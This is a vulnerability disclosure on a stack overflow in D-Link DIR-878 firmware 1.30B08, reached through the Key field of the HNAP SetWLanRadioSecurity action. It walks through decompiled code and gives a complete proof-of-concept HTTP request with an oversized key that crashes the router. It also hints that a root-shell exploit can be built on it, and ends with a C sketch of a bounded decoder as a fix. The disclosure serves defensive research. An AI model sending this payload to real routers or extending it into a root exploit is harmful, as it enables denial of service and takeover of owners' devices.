# D-Link DIR-878 was discovered stack overflow in the SetWLanRadioSecurity module

###### tags: `D-Link` `DIR-878`

vendor: D-Link
product: DIR-878
version: DIR_878_FW1.30B08.bin
type: Stack Overflow
author: Wolin Zhuang, Yifeng Li

## Vulnerability Description

D-Link DIR-878 DIR_878_FW1.30B08.bin was discovered to contain a stack overflow via the Key parameter in the SetWLanRadioSecurity module.

## Vulnerability Details

In the SetWLanRadioSecurity module, the content the program obtains from /SetWLanRadioSecurity/Key is stored in v23, which is controllable by the attacker, and is then passed as a parameter into the function decrypt_aes.

![](https://i.imgur.com/tb6rDM7.png)
![](https://i.imgur.com/o4YAWMg.png)
![](https://i.imgur.com/Qacska1.png)

After that, it (a2 in decrypt_aes) is passed into function sub_426D74 as the first parameter. We also notice that the local variable v6 is placed on the stack and is passed into function sub_426D74 as the second parameter.

![](https://i.imgur.com/DDR99OK.png)

In function sub_426D74, the for loop from line 26 to line 32 first copies a1 into v7 and then uses strtol to convert v7 into a2; in short, a2 equals hexdecode(a1). Let's start over again: a1 comes from a2 in function decrypt_aes, a variable that is controllable by the attacker, and a2 comes from v6 in function decrypt_aes, which is placed on the stack. So when we copy a1 to a2 in sub_426D74, we are basically putting v4's value into v6, and nothing checks that the decoded data fits in v6, which leads to a stack overflow vulnerability.

![](https://i.imgur.com/dTeLfRi.png)

## Reproducing the vulnerability and POC

In order to reproduce the vulnerability, the following steps can be followed:

1. Install firmware DIR_878_FW1.30B08.bin on the DIR-878 router
2. Log in to 192.168.0.1 as admin
3. Attack with the following POC

![](https://i.imgur.com/pulK4fi.png)
![](https://i.imgur.com/cjbC8LY.png)

```
POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1
Content-Length: 2903
Accept: */*
X-Requested-With: XMLHttpRequest
HNAP_AUTH: 6308CC54400705CDC272C5CDED0255EA 1675664856301
SOAPAction: "http://purenetworks.com/HNAP1/SetMultipleActions"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36
Content-Type: text/xml; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/GuestZone.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: uid=S6ZOyU04
Connection: close

<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><SetMultipleActions xmlns="http://purenetworks.com/HNAP1/"><SetWLanRadioSettings xmlns="http://purenetworks.com/HNAP1/"><RadioID>RADIO_2.4GHz_Guest</RadioID><Enabled>true</Enabled><Mode>802.11bgn</Mode><SSID>dlink-guest</SSID><SSIDBroadcast>true</SSIDBroadcast><ChannelWidth>40</ChannelWidth><Channel>0</Channel><SecondaryChannel>0</SecondaryChannel><QoS>true</QoS><ScheduleName>Always</ScheduleName><TXPower></TXPower><Coexistence>false</Coexistence><MUMIMOEnabled>true</MUMIMOEnabled><BandSteeringEnabled>true</BandSteeringEnabled><AirTimeFairnessEnabled>true</AirTimeFairnessEnabled></SetWLanRadioSettings><SetWLanRadioSecurity xmlns="http://purenetworks.com/HNAP1/"><RadioID>RADIO_2.4GHz_Guest</RadioID><Enabled>true</Enabled><Type>WPAORWPA2-PSK</Type><Encryption>TKIPORAES</Encryption><KeyRenewal>3600</KeyRenewal><RadiusIP1></RadiusIP1><RadiusPort1></RadiusPort1><RadiusSecret1></RadiusSecret1><RadiusIP2></RadiusIP2><RadiusPort2></RadiusPort2><RadiusSecret2></RadiusSecret2><Key>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</Key></SetWLanRadioSecurity><SetWLanRadioSettings xmlns="http://purenetworks.com/HNAP1/"><RadioID>RADIO_5GHz_Guest</RadioID><Enabled>true</Enabled><Mode>802.11anac</Mode><SSID>dlink-guest</SSID><SSIDBroadcast>true</SSIDBroadcast><ChannelWidth>1</ChannelWidth><Channel>0</Channel><SecondaryChannel>0</SecondaryChannel><QoS>true</QoS><ScheduleName>Always</ScheduleName><TXPower></TXPower><Coexistence>false</Coexistence><MUMIMOEnabled>true</MUMIMOEnabled><BandSteeringEnabled>true</BandSteeringEnabled><AirTimeFairnessEnabled>true</AirTimeFairnessEnabled></SetWLanRadioSettings><SetWLanRadioSecurity xmlns="http://purenetworks.com/HNAP1/"><RadioID>RADIO_5GHz_Guest</RadioID><Enabled>false</Enabled><Type></Type><Encryption></Encryption><KeyRenewal></KeyRenewal><RadiusIP1></RadiusIP1><RadiusPort1></RadiusPort1><RadiusSecret1></RadiusSecret1><RadiusIP2></RadiusIP2><RadiusPort2></RadiusPort2><RadiusSecret2></RadiusSecret2><Key>2d6d4d12a46ef600678580a6573e51612d6d4d12a46ef600678580a6573e51612d6d4d12a46ef600678580a6573e51612d6d4d12a46ef600678580a6573e5161</Key></SetWLanRadioSecurity><SetGuestZoneRouterSettings xmlns="http://purenetworks.com/HNAP1/"><InternetAccessOnly>true</InternetAccessOnly><IPAddress></IPAddress><SubnetMask></SubnetMask><DHCPServer>true</DHCPServer><DHCPRangeStart></DHCPRangeStart><DHCPRangeEnd></DHCPRangeEnd><DHCPLeaseTime>0</DHCPLeaseTime></SetGuestZoneRouterSettings></SetMultipleActions></soap:Body></soap:Envelope>
```

By sending a delicately constructed data package such as the POC above, we can cause a stack overflow error, leading to denial of service.

![](https://i.imgur.com/DMgwV2R.png)

You can write your own exp to get the root shell.
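As an added example, not code from this advisory or from the firmware, the C sketch below shows how the hex-decoding loop described in sub_426D74 can be bounded so that an oversized or malformed Key is rejected instead of being written past the end of the stack buffer; KEY_BUF_CAP is an assumed size, since the advisory does not state how large v6 is.

```c
#include <stddef.h>
#include <string.h>
/* Hardened version of the hex-decoding loop in sub_426D74 (two hex chars ->
 * one byte).  Returns bytes written to `out` (capacity `out_cap`), or -1 when
 * the input is malformed or too long, so the stack buffer is never overrun. */
static int hex_val(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

long hex_decode_bounded(const char *hex, unsigned char *out, size_t out_cap) {
    size_t len = strlen(hex);
    if (len % 2 != 0 || len / 2 > out_cap)   /* whole bytes, and must fit: */
        return -1;                           /* the check the firmware lacks */
    for (size_t i = 0; i < len; i += 2) {
        int hi = hex_val((unsigned char)hex[i]);
        int lo = hex_val((unsigned char)hex[i + 1]);
        if (hi < 0 || lo < 0)                /* strtol would accept junk here */
            return -1;
        out[i / 2] = (unsigned char)((hi << 4) | lo);
    }
    return (long)(len / 2);
}

/* Assumed capacity of the stack buffer (the advisory does not state v6's real
 * size); 64 bytes holds a 128-hex-character key, like the 5GHz Key, exactly. */
#define KEY_BUF_CAP 64

/* Models the handler: decode the request's Key into a fixed stack buffer.
 * Returns 1 if accepted, 0 if rejected as oversized or malformed. */
int accept_key(const char *key_from_request) {
    unsigned char buf[KEY_BUF_CAP];
    return hex_decode_bounded(key_from_request, buf, sizeof buf) >= 0;
}

/* Decoded byte at index `idx`, or -1 if decoding fails or idx is out of range. */
int decoded_byte(const char *hex, size_t idx) {
    unsigned char buf[KEY_BUF_CAP];
    long n = hex_decode_bounded(hex, buf, sizeof buf);
    return (n < 0 || idx >= (size_t)n) ? -1 : buf[idx];
}

/* Constructed Key of n repeated 'a' characters, the shape of the POC payload. */
int repeated_a_key_accepted(size_t n) {
    char key[1024] = {0};
    memset(key, 'a', n < sizeof key - 1 ? n : sizeof key - 1);
    return accept_key(key);
}
```

A 128-character key fills the assumed buffer exactly and is accepted, while one character more is refused before any write happens.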